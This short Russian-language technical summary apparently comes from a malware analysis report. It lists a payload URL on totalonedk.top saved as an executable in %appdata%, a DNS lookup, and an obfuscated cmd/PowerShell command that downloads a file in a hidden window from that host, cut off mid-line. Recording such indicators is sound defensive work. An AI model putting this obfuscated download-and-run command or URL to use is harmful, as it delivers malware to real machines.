Техническая информация
- http://totalonedk.top/read.php?f=0.dat как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "P^o^WersHE^L^l^.ex^E^ -^exe^c^utI^ONP^OLic^Y b^YPass^ -NOPrOf^ILE -w^iN^D^Ow^STY^LE ^HidDeN (n^E^W^-O^b^jECT^ S^Yst^EM.net.^wEbcL^Ie^nt^)^.^D^ow^N^L^OA^dF^IL^E('http://tot...
- DNS ASK to###onedk.top
- '<SYSTEM32>\cmd.exe' /C "P^o^WersHE^L^l^.ex^E^ -^exe^c^utI^ONP^OLic^Y b^YPass^ -NOPrOf^ILE -w^iN^D^Ow^STY^LE ^HidDeN (n^E^W^-O^b^jECT^ S^Yst^EM.net.^wEbcL^Ie^nt^)^.^D^ow^N^L^OA^dF^IL^E('http://tot...' (со скрытым окном)